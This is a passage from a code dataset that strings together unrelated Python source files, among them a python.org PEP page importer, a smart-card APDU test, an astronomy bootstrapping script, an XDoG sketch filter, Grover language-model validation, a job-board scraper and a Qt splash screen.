pep_path = os.path.join(settings.PEP_REPO_PATH, 'pep-{}.html'.format(pep_number))
if not os.path.exists(pep_path):
print("PEP Path '{}' does not exist, skipping".format(pep_path))
pep_content = convert_pep_page(pep_number, open(pep_path).read())
pep_page, _ = Page.objects.get_or_create(path=pep_url(pep_number))
# Remove leading zeros from PEP number for display purposes
pep_number_string = str(pep_number)
pep_number_string = re.sub(r'^0+', '', pep_number_string)
pep_page.title = pep_content['title']
pep_page.content = pep_content['content']
pep_page.content_markup_type = 'html'
pep_page.template_name = PEP_TEMPLATE
if commit:
pep_page.save()
return pep_page
def add_pep_image(pep_number, path):
image_path = os.path.join(settings.PEP_REPO_PATH, path)
if not os.path.exists(image_path):
print("Image Path '{}' does not exist, skipping".format(image_path))
try:
page = Page.objects.get(path=pep_url(pep_number))
except Page.DoesNotExist:
print("Could not find backing PEP {}".format(pep_number))
return
# Find existing images, we have to loop here as we can't use the ORM
# to query against image__path
existing_images = Image.objects.filter(page=page)
MISSING = False
FOUND = False
for image in existing_images:
image_root_path = os.path.join(settings.MEDIA_ROOT, page.path, path)
if image.image.path.endswith(path):
FOUND = True
# File is missing on disk, recreate
if not os.path.exists(image_root_path):
MISSING = image
break
if not FOUND or MISSING:
image = None
if MISSING:
image = MISSING
else:
image = Image(page=page)
with open(image_path, 'rb') as image_obj:
image.image.save(path, File(image_obj))
image.save()
# Old images used to live alongside html, but now they're in different
# places, so update the page accordingly.
soup = BeautifulSoup(page.content.raw)
for img_tag in soup.findAll('img'):
if img_tag['src'] == path:
img_tag['src'] = os.path.join(settings.MEDIA_URL, page.path, path)
page.content.raw = soup.prettify()
page.save()
return image
def get_peps_rss():
rss_feed = os.path.join(settings.PEP_REPO_PATH, 'peps.rss')
if not os.path.exists(rss_feed):
return
page, _ = Page.objects.get_or_create(
path="dev/peps/peps.rss",
template_name="pages/raw.html",
)
with open(rss_feed, "r") as rss_content:
content = rss_content.read()
page.content = content
page.is_published = True
page.content_type = "application/rss+xml"
page.save()
return page
| 2.296875 | 2 |
venv/Lib/site-packages/toolz/sandbox/__init__.py | ajayiagbebaku/NFL-Model | 3,749 | 1118 | from .core import EqualityHashKey, unzip
from .parallel import fold
| 1.148438 | 1 |
interface/app/__init__.py | caglorithm/accel | 31 | 1119 | from flask import Flask
app = Flask(__name__, static_folder='static')
from app import routes
| 1.578125 | 2 |
implementations/python3/tests/CAPDU.py | sebastien-riou/SATL | 4 | 1120 | <reponame>sebastien-riou/SATL
import os
import pysatl
from pysatl import CAPDU
if __name__ == "__main__":
def check(hexstr, expected):
capdu = CAPDU.from_hexstr(hexstr)
if capdu != expected:
raise Exception("Mismatch for input '"+hexstr+"'\nActual: "+str(capdu)+"\nExpected: "+str(expected))
def gencase(* ,LC ,LE):
assert(LC < 0x10000)
assert(LE <= 0x10000)
data = os.getrandom(LC)
hexstr = "00112233"
case4 = LC>0 and LE>0
case4e = case4 and (LC>0xFF or LE>0x100)
if LC>0:
if LC>0xFF or case4e:
hexstr += "00%04X"%LC
else:
hexstr += "%02X" % LC
hexstr += pysatl.Utils.hexstr(data, separator="")
if LE>0:
if case4e:
if LE == 0x10000:
hexstr += "0000"
else:
hexstr += "%04X"%LE
elif LE == 0x10000:
hexstr += "000000"
elif LE>0x100:
hexstr += "00%04X"%LE
elif LE == 0x100:
hexstr += "00"
else:
hexstr += "%02X" % LE
expected = hexstr
capdu = CAPDU(CLA=0x00, INS=0x11, P1=0x22, P2=0x33, DATA=data, LE=LE)
hexstr = capdu.to_hexstr()
if hexstr != expected:
raise Exception("Mismatch for LC=%d, LE=%d"%(LC,LE)+"\nActual: "+hexstr+"\nExpected: "+expected)
b = capdu.to_bytes()
assert(type(b) is bytes)
return (hexstr, capdu)
#check __repr__
expected = "pysatl.CAPDU.from_hexstr('00112233015502')"
capdu=None
exec("capdu="+expected)
assert(expected==repr(capdu))
#check well formed inputs
check("00112233", CAPDU(CLA=0x00, INS=0x11, P1=0x22, P2=0x33))
check("00 11 22 33", CAPDU(CLA=0x00, INS=0x11, P1=0x22, P2=0x33))
check("0x00,0x11,0x22,0x33", CAPDU(CLA=0x00, INS=0x11, P1=0x22, P2=0x33))
#check we tolerate less well formed inputs
check("00-11,22_33", CAPDU(CLA=0x00, INS=0x11, P1=0x22, P2=0x33))
check("""0x00 0x11 0x22
0x33""", CAPDU(CLA=0x00, INS=0x11, P1=0x22, P2=0x33))
check("1 2 304", CAPDU(CLA=0x01, INS=0x02, P1=0x03, P2=0x04))
LC_cases = [0,1,2,254,255,256,257,65534,65535]
LE_cases = LC_cases + [65536]
for LC in LC_cases:
for LE in LE_cases:
print(LC,LE)
check(*gencase(LC=LC, LE=LE))
| 2.84375 | 3 |
src/mgls_bootstrapping.py | rosich/mgls | 0 | 1121 | <filename>src/mgls_bootstrapping.py
#!/usr/bin/python
from math import sin, cos, tan, atan, pi, acos, sqrt, exp, log10
import sys, os
import copy
import random
import numpy as np
import multiprocessing as mp
import ConfigParser
sys.path.append('./bin')
import mGLS, mMGLS
sys.path.append('./src')
from EnvGlobals import Globals
import mgls_io
import mgls_mc
from mgls_lib import *
#definitions and constants
to_radians = pi/180.0
to_deg = 1.0/to_radians
#-------------------------
def _gls_instance_Ndim_bootstrapping(n_runs):
"""executes n_runs instances of MGLS for with previous data shuffle
"""
cpu_periodogram = list()
for iter in range(n_runs):
"""
#shuffle RV's and their errors. Repetition is not allowed
comb_rv_err = zip(Globals.rv, Globals.rv_err)
random.shuffle(comb_rv_err)
Globals.rv[:], Globals.rv_err[:] = zip(*comb_rv_err)
"""
#allowing repetition
rv = [0.0]*len(Globals.time)
rv_err = [0.0]*len(Globals.time)
for i in range(len(Globals.time)):
index = int(random.uniform(0,len(Globals.time)))
rv[i] = Globals.rv[index]
rv_err[i] = Globals.rv_err[index]
Globals.rv = rv
Globals.rv_err = rv_err
opt_state = mgls_mc.optimal(Globals.ndim, msgs = False, temp_steps=20, n_iter=1000)
pwr_opt, fitting_coeffs, A = mgls(opt_state)
cpu_periodogram.append(pwr_opt) #save the best period determination (highest power)
return cpu_periodogram
def fap(bootstrapping_stats, pwr):
"""returns FAP for a given pwr. i.e. how many realizations overcome
a given power, over unit.
"""
return float(sum(i > pwr for i in bootstrapping_stats))/len(bootstrapping_stats)
def fap_levels(bootstrapping_stats):
"""determines which power a FAP of 1, 0.1, 0.01 % is reached
"""
FAPs = [1.0, 0.1, 0.01, 0.001] #FAPS to compute in %
n_bs = len(bootstrapping_stats)
#sort bootstrapping_stats vector ascendently
sorted_pwr = sorted(bootstrapping_stats)
return [np.percentile(sorted_pwr,100-FAPs[i]) for i in range(len(FAPs))]
def parallel_Mdim_bootstrapping(n_bootstrapping):
"""
"""
n_runs = [n_bootstrapping/Globals.ncpus for i in range(Globals.ncpus)]
pool = mp.Pool(Globals.ncpus) #ncpus available
#run parallell execution
try:
out = pool.map_async(_gls_instance_Ndim_bootstrapping, n_runs).get(1./.0001)
pool.terminate()
except KeyboardInterrupt:
pool.terminate()
sys.exit()
"""
except ZeroDivisionError:
print "Error: Zero division error. Restarted parallel bootstapping"
"""
#join the output bunches
out_spectra = list()
for cpu in range(len(n_runs)):
out_spectra.extend(out[cpu])
bootstrapping_stats = list()
for j in range(len(out_spectra)):
bootstrapping_stats.append(out_spectra[j])
return bootstrapping_stats
def parallel_bootstrapping(n_bootstrapping):
"""
"""
n_runs = [n_bootstrapping/Globals.ncpus for i in range(Globals.ncpus)]
pool = mp.Pool(Globals.ncpus) #ncpus available
#run parallell execution
try:
out = pool.map_async(_gls_instance_bootstrapping, n_runs).get(1./.00001)
pool.terminate()
except KeyboardInterrupt:
pool.terminate()
sys.exit()
#join the output bunches
out_spectra = list()
for cpu in range(len(n_runs)):
out_spectra.extend(out[cpu])
bootstrapping_stats = list()
for j in range(len(out_spectra)):
bootstrapping_stats.append(out_spectra[j])
return bootstrapping_stats
def Mdim_bootstrapping(max_pow):
"""
"""
#n_bootstrapping = 500 #iterations
bootstrapping_stats = parallel_Mdim_bootstrapping(Globals.n_bootstrapping)
print "\n//BOOTSTRAPPING:// {1.0, 0.1, 0.01, 0.001}%"
print "FAP Levels:", fap_levels(bootstrapping_stats)
print "Total bootstapping samples: ", len(bootstrapping_stats)
return bootstrapping_stats
| 2.171875 | 2 |
mgmt/src/constants.py | pcaruana/sombrio | 0 | 1122 | #! /usr/bin/env python3
"""
constants.py - Contains all constants used by the device manager
Author:
- <NAME> (<EMAIL> at <EMAIL> dot <EMAIL>)
Date: 12/3/2016
"""
number_of_rows = 3 # total number rows of Index Servers
number_of_links = 5 # number of links to be sent to Crawler
number_of_chunks = 5 # number of chunks to be sent to Index Builder
number_of_comps = 10 # number of components managed by each watchdog
| 1.242188 | 1 |
XDoG/XDoG.py | STomoya/sketchify | 0 | 1123 | <filename>XDoG/XDoG.py
import cv2
import numpy as np
def DoG(image, size, sigma, k=1.6, gamma=1.):
g1 = cv2.GaussianBlur(image, (size, size), sigma)
g2 = cv2.GaussianBlur(image, (size, size), sigma*k)
return g1 - gamma * g2
def XDoG(image, size, sigma, eps, phi, k=1.6, gamma=1.):
eps /= 255
d = DoG(image, size, sigma, k, gamma)
d /= d.max()
e = 1 + np.tanh(phi * (d - eps))
e[e >= 1] = 1
return e * 255
# This config is found by the author
# modify if not the desired output
XDoG_config = dict(
size=0,
sigma=0.6,
eps=-15,
phi=10e8,
k=2.5,
gamma=0.97
)
def gen_xdog_image(src, dst):
gray = cv2.imread(src, cv2.IMREAD_GRAYSCALE)
# I wanted the gamma between [0.97, 0.98]
# but it depends on the image so I made it move randomly
# comment out if this is not needed
XDoG_config['gamma'] += 0.01 * np.random.rand(1)
dogged = XDoG(gray, **XDoG_config)
cv2.imwrite(dst, dogged)
if __name__ == "__main__":
gen_xdog_image('sample.jpg', 'dog.jpg') | 2.6875 | 3 |
lm/validate.py | ericlin8545/grover | 864 | 1124 | <reponame>ericlin8545/grover
# Original work Copyright 2018 The Google AI Language Team Authors.
# Modified work Copyright 2019 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from lm.modeling import model_fn_builder, GroverConfig
import tensorflow as tf
from lm.dataloader import input_fn_builder
import numpy as np
import tempfile
import h5py
from google.cloud import storage
flags = tf.flags
FLAGS = flags.FLAGS
## Required parameters
flags.DEFINE_string(
"config_file", 'configs/base.json',
"The config json file corresponding to the pre-trained news model. "
"This specifies the model architecture.")
flags.DEFINE_string(
"input_file", None,
"Input TF example files (can be a glob or comma separated).")
flags.DEFINE_string(
"output_dir", None,
"The output directory where the model checkpoints will be written.")
flags.DEFINE_string(
"validation_name", 'preds.h5',
"Name to use")
## Other parameters
flags.DEFINE_string(
"init_checkpoint", None,
"Initial checkpoint (usually from a pre-trained model).")
flags.DEFINE_integer(
"max_seq_length", 1024,
"The maximum total input sequence length after WordPiece tokenization. "
"Sequences longer than this will be truncated, and sequences shorter "
"than this will be padded. Must match data generation.")
flags.DEFINE_integer("iterations_per_loop", 1000,
"How many steps to make in each estimator call.")
flags.DEFINE_integer("batch_size", 32, "Batch size used for eval")
flags.DEFINE_bool("use_tpu", False, "Whether to use TPU or GPU/CPU.")
flags.DEFINE_string(
"tpu_name", None,
"The Cloud TPU to use for training. This should be either the name "
"used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 "
"url.")
flags.DEFINE_string(
"tpu_zone", None,
"[Optional] GCE zone where the Cloud TPU is located in. If not "
"specified, we will attempt to automatically detect the GCE project from "
"metadata.")
flags.DEFINE_string(
"gcp_project", None,
"[Optional] Project name for the Cloud TPU-enabled project. If not "
"specified, we will attempt to automatically detect the GCE project from "
"metadata.")
flags.DEFINE_string("master", None, "[Optional] TensorFlow master URL.")
flags.DEFINE_integer(
"num_tpu_cores", 8,
"Only used if `use_tpu` is True. Total number of TPU cores to use.")
# This is a handy little utility so that we can save the perplexities to TPU
class gcloudwriter():
def __init__(self, gcloud_name):
assert gcloud_name.startswith('gs://')
self.gcloud_name = gcloud_name
bucket_name, blob_name = gcloud_name.split('gs://')[1].split('/', 1)
bucket = storage.Client().get_bucket(bucket_name)
self.blob = bucket.blob(blob_name)
def __enter__(self):
self.tempfile = tempfile.NamedTemporaryFile()
return self.tempfile
def __exit__(self, *args):
self.tempfile.flush()
print("UPLOADING TO {}".format(self.gcloud_name), flush=True)
self.blob.upload_from_filename(self.tempfile.name)
self.tempfile.close()
def ind_where(array: np.ndarray, target, return_first_match=True, default_value=-1):
"""
:param array: Single dimension array
:param target: target to search for
:param return_first_match: If true, return the first index that matches, otherwise, return the last one
:param default_value: Index to return if there was no match
:return: index of the first match, or -1 if nothing
"""
assert array.ndim == 1
matching_inds = np.where(array == target)[0]
if len(matching_inds) > 0:
if return_first_match:
return int(matching_inds[0])
else:
return int(matching_inds[-1])
return default_value
def main(_):
tf.logging.set_verbosity(tf.logging.INFO)
news_config = GroverConfig.from_json_file(FLAGS.config_file)
tf.gfile.MakeDirs(FLAGS.output_dir)
input_files = []
for input_pattern in FLAGS.input_file.split(","):
input_files.extend(tf.gfile.Glob(input_pattern))
tf.logging.info("*** Input Files ***")
for input_file in input_files:
tf.logging.info(" %s" % input_file)
tpu_cluster_resolver = None
if FLAGS.use_tpu and FLAGS.tpu_name:
tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver(
FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
is_per_host = tf.contrib.tpu.InputPipelineConfig.PER_HOST_V2
run_config = tf.contrib.tpu.RunConfig(
cluster=tpu_cluster_resolver,
master=FLAGS.master,
model_dir=FLAGS.output_dir,
save_checkpoints_steps=FLAGS.iterations_per_loop,
keep_checkpoint_max=None,
tpu_config=tf.contrib.tpu.TPUConfig(
iterations_per_loop=FLAGS.iterations_per_loop,
num_shards=FLAGS.num_tpu_cores,
per_host_input_for_training=is_per_host))
model_fn = model_fn_builder(news_config,
init_checkpoint=FLAGS.init_checkpoint,
learning_rate=1e-4,
num_train_steps=0,
num_warmup_steps=0,
use_tpu=FLAGS.use_tpu,
)
# If TPU is not available, this will fall back to normal Estimator on CPU
# or GPU.
estimator = tf.contrib.tpu.TPUEstimator(
use_tpu=FLAGS.use_tpu,
model_fn=model_fn,
config=run_config,
train_batch_size=FLAGS.batch_size,
eval_batch_size=FLAGS.batch_size,
predict_batch_size=FLAGS.batch_size,
params={'model_dir': FLAGS.output_dir}
)
eval_input_fn = input_fn_builder(
input_files=input_files,
seq_length=FLAGS.max_seq_length,
evaluate_for_fixed_number_of_steps=False,
num_cpu_threads=1,
is_training=False)
result = [x for x in estimator.predict(input_fn=eval_input_fn, yield_single_examples=True)]
cats = sorted(result[0].keys())
result_stack = {cat: np.stack([x[cat] for x in result]) for cat in cats}
with gcloudwriter(os.path.join(FLAGS.output_dir, FLAGS.validation_name)) as tempfile_name:
with h5py.File(tempfile_name, 'w') as h5:
for cat, data in result_stack.items():
dtype2use = np.float16 if cat.endswith(('logprobs', 'top_p_required')) else np.uint16
h5.create_dataset(cat, data=data.astype(dtype2use))
h5.create_dataset('model', data=FLAGS.config_file)
h5.create_dataset('ckpt', data=FLAGS.init_checkpoint)
h5.create_dataset('input_file', data=FLAGS.input_file)
# This gives the perplexity of the entire article. if you want to replicate the results of the paper you
# might need to do something different to extract the ppl of just the body in particular.
ppl_ex = []
for logprobs_i, ids_i in zip(result_stack['gt_logprobs'], result_stack['labels']):
# Omit the first token. Keep in mind input_ids is shifted by 1
start_ind = ind_where(ids_i, target=50265, default_value=0)
end_ind = ind_where(ids_i, target=50266, default_value=ids_i.shape[0] - 1)
ppl_ex.append(logprobs_i[start_ind:end_ind])
ppl_ex = np.concatenate(ppl_ex, 0)
print("Article perplexity is {:.3f}".format(np.exp(-np.mean(ppl_ex))), flush=True)
if __name__ == "__main__":
flags.mark_flag_as_required("input_file")
flags.mark_flag_as_required("output_dir")
tf.app.run()
| 1.835938 | 2 |
robo/fmin/entropy_search.py | fuhuifang/RoBo | 0 | 1125 | import logging
import george
import numpy as np
from robo.priors.default_priors import DefaultPrior
from robo.models.gaussian_process import GaussianProcess
from robo.models.gaussian_process_mcmc import GaussianProcessMCMC
from robo.maximizers.random_sampling import RandomSampling
from robo.maximizers.scipy_optimizer import SciPyOptimizer
from robo.maximizers.differential_evolution import DifferentialEvolution
from robo.solver.bayesian_optimization import BayesianOptimization
from robo.acquisition_functions.information_gain import InformationGain
from robo.acquisition_functions.ei import EI
from robo.acquisition_functions.marginalization import MarginalizationGPMCMC
from robo.initial_design import init_latin_hypercube_sampling
logger = logging.getLogger(__name__)
def entropy_search(objective_function, lower, upper, num_iterations=30,
maximizer="random", model="gp_mcmc",
n_init=3, output_path=None, rng=None):
"""
Entropy search for global black box optimization problems. This is a reimplemenation of the entropy search
algorithm by Henning and Schuler[1].
[1] Entropy search for information-efficient global optimization.
<NAME> and <NAME>.
JMLR, (1), 2012.
Parameters
----------
objective_function: function
The objective function that is minimized. This function gets a numpy array (D,) as input and returns
the function value (scalar)
lower: np.ndarray (D,)
The lower bound of the search space
upper: np.ndarray (D,)
The upper bound of the search space
num_iterations: int
The number of iterations (initial design + BO)
maximizer: {"random", "scipy", "differential_evolution"}
Defines how the acquisition function is maximized.
model: {"gp", "gp_mcmc"}
The model for the objective function.
n_init: int
Number of points for the initial design. Make sure that it is <= num_iterations.
output_path: string
Specifies the path where the intermediate output after each iteration will be saved.
If None no output will be saved to disk.
rng: numpy.random.RandomState
Random number generator
Returns
-------
dict with all results
"""
assert upper.shape[0] == lower.shape[0], "Dimension miss match"
assert np.all(lower < upper), "Lower bound >= upper bound"
assert n_init <= num_iterations, "Number of initial design point has to be <= than the number of iterations"
if rng is None:
rng = np.random.RandomState(np.random.randint(0, 10000))
cov_amp = 2
n_dims = lower.shape[0]
initial_ls = np.ones([n_dims])
exp_kernel = george.kernels.Matern52Kernel(initial_ls,
ndim=n_dims)
kernel = cov_amp * exp_kernel
prior = DefaultPrior(len(kernel) + 1)
n_hypers = 3 * len(kernel)
if n_hypers % 2 == 1:
n_hypers += 1
if model == "gp":
gp = GaussianProcess(kernel, prior=prior, rng=rng,
normalize_output=False, normalize_input=True,
lower=lower, upper=upper)
elif model == "gp_mcmc":
gp = GaussianProcessMCMC(kernel, prior=prior,
n_hypers=n_hypers,
chain_length=200,
burnin_steps=100,
normalize_input=True,
normalize_output=False,
rng=rng, lower=lower, upper=upper)
else:
print("ERROR: %s is not a valid model!" % model)
return
a = InformationGain(gp, lower=lower, upper=upper, sampling_acquisition=EI)
if model == "gp":
acquisition_func = a
elif model == "gp_mcmc":
acquisition_func = MarginalizationGPMCMC(a)
if maximizer == "random":
max_func = RandomSampling(acquisition_func, lower, upper, rng=rng)
elif maximizer == "scipy":
max_func = SciPyOptimizer(acquisition_func, lower, upper, rng=rng)
elif maximizer == "differential_evolution":
max_func = DifferentialEvolution(acquisition_func, lower, upper, rng=rng)
else:
print("ERROR: %s is not a valid function to maximize the acquisition function!" % maximizer)
return
bo = BayesianOptimization(objective_function, lower, upper, acquisition_func, gp, max_func,
initial_design=init_latin_hypercube_sampling,
initial_points=n_init, rng=rng, output_path=output_path)
x_best, f_min = bo.run(num_iterations)
results = dict()
results["x_opt"] = x_best
results["f_opt"] = f_min
results["incumbents"] = [inc for inc in bo.incumbents]
results["incumbent_values"] = [val for val in bo.incumbents_values]
results["runtime"] = bo.runtime
results["overhead"] = bo.time_overhead
results["X"] = [x.tolist() for x in bo.X]
results["y"] = [y for y in bo.y]
return results
| 2.453125 | 2 |
biserici_inlemnite/app/migrations/0096_bisericapage_datare_an.py | ck-tm/biserici-inlemnite | 0 | 1126 | # Generated by Django 3.1.13 on 2021-10-29 11:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0095_bisericapage_utitle'),
]
operations = [
migrations.AddField(
model_name='bisericapage',
name='datare_an',
field=models.IntegerField(blank=True, null=True),
),
]
| 1.507813 | 2 |
services/core-api/app/api/mms_now_submissions/models/surface_bulk_sample_activity.py | bcgov/mds | 25 | 1127 | <reponame>bcgov/mds
from app.api.utils.models_mixins import Base
from app.extensions import db
class MMSSurfaceBulkSampleActivity(Base):
__tablename__ = "surface_bulk_sample_activity"
__table_args__ = {"schema": "mms_now_submissions"}
id = db.Column(db.Integer, primary_key=True)
messageid = db.Column(db.Integer, db.ForeignKey('mms_now_submissions.application.messageid'))
mms_cid = db.Column(db.Integer)
type = db.Column(db.String)
disturbedarea = db.Column(db.Numeric(14, 2))
timbervolume = db.Column(db.Numeric(14, 2))
quantity = db.Column(db.Integer)
def __repr__(self):
return '<MMSSurfaceBulkSampleActivity %r>' % self.id
| 1.96875 | 2 |
lgtv_rs232/commands/remote_control/remote_control_lock.py | davo22/lgtv_rs232 | 0 | 1128 | from enum import Enum
class RemoteControlLock(Enum):
OFF = 0
ON = 1
def map_to_state(data: int):
return RemoteControlLock(data)
class RemoteControlLockCommands(object):
_command = "km"
def __init__(self, send_command):
self._send_command = send_command
async def get_state(self):
return map_to_state(await self._send_command(self._command, 255))
async def set_state(self, state: RemoteControlLock):
return map_to_state(await self._send_command(self._command, state.value))
def on(self):
return self.set_state(RemoteControlLock.ON)
def off(self):
return self.set_state(RemoteControlLock.OFF)
| 3.109375 | 3 |
com/bridgelabz/programs/powerof2.py | aashishogale/FunctionalPrograms-Python- | 0 | 1129 | <reponame>aashishogale/FunctionalPrograms-Python-
import sys
from com.bridgelabz.utility.Utility import Utility
class PowerOf2:
def start(self):
number=int(sys.argv[1])
print(number)
for i in Utility().powerof2(number):
print(i)
return
PowerOf2().start() | 3.09375 | 3 |
app/main.py | MichaelLeeman/Job_Web_Scraper | 0 | 1130 | <filename>app/main.py<gh_stars>0
# This program scraps data from job postings on the website workinstartups.com and appends it to an excel worksheet.
import os
from datetime import datetime, timedelta
from selenium import webdriver
from app import web_scraper
from app import excel
job_list, last_date = [], None
file_path = os.path.abspath("main.py").rstrip('/app/main.py') + '//Workbooks' + "//Job_Openings.xlsx"
print("-" * 75, "-" * 75, "\n\t\t\t\t\t\t\t JOB WEB SCRAPER", "-" * 75, "-" * 75, sep="\n")
print("\n")
# If the Job_Openings workbook already exists then append the jobs not already in the worksheet
# by checking the date of the first job in excel, since the last time the site was scraped.
if os.path.isfile(file_path):
print("Job_Opening excel file already exists. Loading workbook.", "-" * 75, sep="\n")
workbook, worksheet = excel.load_xlsx(file_path)
last_scrape_date = excel.get_first_job_date(worksheet)
last_scrape_date = datetime.strptime(last_scrape_date, "%d-%b-%Y")
# If not, create a new workbook and append all of the jobs posted within the month
else:
print("Creating new Excel workbook.", "-" * 75, sep="\n")
current_date = datetime.today()
date_month_ago = current_date - timedelta(weeks=4.348) # Average amount of weeks in a month
last_scrape_date = date_month_ago.replace(hour=0, minute=0, second=0, microsecond=0) # default to midnight
workbook, worksheet = excel.init_xlsx(worksheet_title="Job Openings")
# Open webdriver to workinstartups.com and create soup
print("Creating soup and opening Chrome webdriver", "-"*75, sep="\n")
URL = "https://workinstartups.com/job-board/jobs-in/london"
soup = web_scraper.soup_creator(URL, max_retry=1, sleep_time=0)
driver = webdriver.Chrome('./chromedriver')
driver.get(URL)
driver.find_element_by_link_text('Close').click()
# Scrap the jobs from workinstartups.com and update the worksheet with the found jobs
print("Scraping jobs from workinstartups.com. Please wait.", "-" * 75, sep="\n")
job_list = web_scraper.search_for_jobs(soup, last_scrape_date, driver)
print("Scraping finished. Updating and saving Excel workbook.", "-" * 75, sep="\n")
driver.close()
excel.update_xlsx(worksheet, job_list)
excel.save_xlsx(workbook, file_path)
print("Finished!", sep="\n")
| 3.46875 | 3 |
src/trusted/validator_arm/dgen_output.py | kapkic/native_client | 1 | 1131 | #!/usr/bin/python2
#
# Copyright (c) 2012 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
"""
Some common boilerplates and helper functions for source code generation
in files dgen_test_output.py and dgen_decode_output.py.
"""
HEADER_BOILERPLATE ="""/*
* Copyright 2013 The Native Client Authors. All rights reserved.
* Use of this source code is governed by a BSD-style license that can
* be found in the LICENSE file.
*/
// DO NOT EDIT: GENERATED CODE
"""
NOT_TCB_BOILERPLATE="""#ifndef NACL_TRUSTED_BUT_NOT_TCB
#error This file is not meant for use in the TCB
#endif
"""
NEWLINE_STR="""
"""
COMMENTED_NEWLINE_STR="""
//"""
"""Adds comment '// ' string after newlines."""
def commented_string(str, indent=''):
sep = NEWLINE_STR + indent + '//'
str = str.replace(NEWLINE_STR, sep)
# This second line is a hack to fix that sometimes newlines are
# represented as '\n'.
# TODO(karl) Find the cause of this hack, and fix it.
return str.replace('\\n', sep)
def ifdef_name(filename):
""" Generates the ifdef name to use for the given filename"""
return filename.replace("/", "_").replace(".", "_").upper() + "_"
def GetNumberCodeBlocks(separators):
"""Gets the number of code blocks to break classes into."""
num_blocks = len(separators) + 1
assert num_blocks >= 2
return num_blocks
def FindBlockIndex(filename, format, num_blocks):
"""Returns true if the filename matches the format with an
index in the range [1, num_blocks]."""
for block in range(1, num_blocks+1):
suffix = format % block
if filename.endswith(suffix):
return block
raise Exception("Can't find block index: %s" % filename)
def GetDecodersBlock(n, separators, decoders, name_fcn):
"""Returns the (sorted) list of decoders to include
in block n, assuming decoders are split using
the list of separators."""
num_blocks = GetNumberCodeBlocks(separators)
assert n > 0 and n <= num_blocks
return [decoder for decoder in decoders
if ((n == 1
or IsPrefixLeDecoder(separators[n-2], decoder, name_fcn)) and
(n == num_blocks or
not IsPrefixLeDecoder(separators[n-1], decoder, name_fcn)))]
def IsPrefixLeDecoder(prefix, decoder, name_fcn):
"""Returns true if the prefix is less than or equal to the
corresponding prefix length of the decoder name."""
decoder_name = name_fcn(decoder)
prefix_len = len(prefix)
decoder_len = len(decoder_name)
decoder_prefix = (decoder_name[0:prefix_len]
if prefix_len < decoder_len
else decoder_name)
return prefix <= decoder_prefix
| 2.8125 | 3 |
src/data_loader/input_data_loader.py | ChristopherBrix/Debona | 2 | 1132 |
"""
Functions for loading input data.
Author: <NAME> <<EMAIL>>
"""
import os
import numpy as np
def load_img(path: str, img_nums: list, shape: tuple) -> np.array:
"""
Loads a image in the human-readable format.
Args:
path:
The path to the to the folder with mnist images.
img_nums:
A list with the numbers of the images we want to load.
shape:
The shape of a single image.
Returns:
The images as a MxCx28x28 numpy array.
"""
images = np.zeros((len(img_nums), *shape), dtype=float)
for idx, i in enumerate(img_nums):
file = os.path.join(path, "image" + str(i))
with open(file, "r") as f:
data = [float(pixel) for pixel in f.readlines()[0].split(",")[:-1]]
images[idx, :, :] = np.array(data).reshape(*shape)
return images
def load_mnist_human_readable(path: str, img_nums: list) -> np.array:
"""
Loads a mnist image from the neurify dataset.
Args:
path:
The path to the to the folder with mnist images.
img_nums:
A list with the numbers of the images we want to load.
Returns:
The images as a Mx28x28 numpy array.
"""
return load_img(path, img_nums, (28, 28))
def load_cifar10_human_readable(path: str, img_nums: list) -> np.array:
"""
Loads the Cifar10 images in human readable format.
Args:
path:
The path to the to the folder with mnist images.
img_nums:
A list with the numbers of the images we want to load.
Returns:
The images as a Mx3x32x32 numpy array.
"""
return load_img(path, img_nums, (3, 32, 32))
def load_images_eran(img_csv: str = "../../resources/images/cifar10_test.csv", num_images: int = 100,
image_shape: tuple = (3, 32, 32)) -> tuple:
"""
Loads the images from the eran csv.
Args:
The csv path
Returns:
images, targets
"""
num_images = 100
images_array = np.zeros((num_images, np.prod(image_shape)), dtype=np.float32)
targets_array = np.zeros(num_images, dtype=int)
with open(img_csv, "r") as file:
for j in range(num_images):
line_arr = file.readline().split(",")
targets_array[j] = int(line_arr[0])
images_array[j] = [float(pixel) for pixel in line_arr[1:]]
return images_array.reshape((num_images, *image_shape)), targets_array
| 3.625 | 4 |
ui_splash_screen.py | hirokiyaginuma/scriptspinner-software | 0 | 1133 | <reponame>hirokiyaginuma/scriptspinner-software
# -*- coding: utf-8 -*-
################################################################################
## Form generated from reading UI file 'splash_screen.ui'
##
## Created by: Qt User Interface Compiler version 5.15.1
##
## WARNING! All changes made in this file will be lost when recompiling UI file!
################################################################################
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
class Ui_Splash_Screen(object):
def setupUi(self, Splash_Screen):
if not Splash_Screen.objectName():
Splash_Screen.setObjectName(u"Splash_Screen")
Splash_Screen.resize(720, 425)
self.centralwidget = QWidget(Splash_Screen)
self.centralwidget.setObjectName(u"centralwidget")
self.verticalLayout = QVBoxLayout(self.centralwidget)
self.verticalLayout.setSpacing(0)
self.verticalLayout.setObjectName(u"verticalLayout")
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.frame = QFrame(self.centralwidget)
self.frame.setObjectName(u"frame")
self.frame.setFrameShape(QFrame.StyledPanel)
self.frame.setFrameShadow(QFrame.Raised)
self.frame.setLineWidth(0)
self.label = QLabel(self.frame)
self.label.setObjectName(u"label")
self.label.setGeometry(QRect(0, 0, 720, 425))
self.label.setLineWidth(0)
self.label.setPixmap(QPixmap(u"img/SS_logo.jpg"))
self.label.setIndent(0)
self.progressBar = QProgressBar(self.frame)
self.progressBar.setObjectName(u"progressBar")
self.progressBar.setGeometry(QRect(70, 330, 591, 41))
self.progressBar.setStyleSheet(u"QProgressBar {\n"
" background-color:rgb(149, 165, 166);\n"
" border-style: none;\n"
" border-radius: 10px;\n"
" text-align: center;\n"
"}\n"
"QProgressBar::chunk {\n"
" border-radius: 10px;\n"
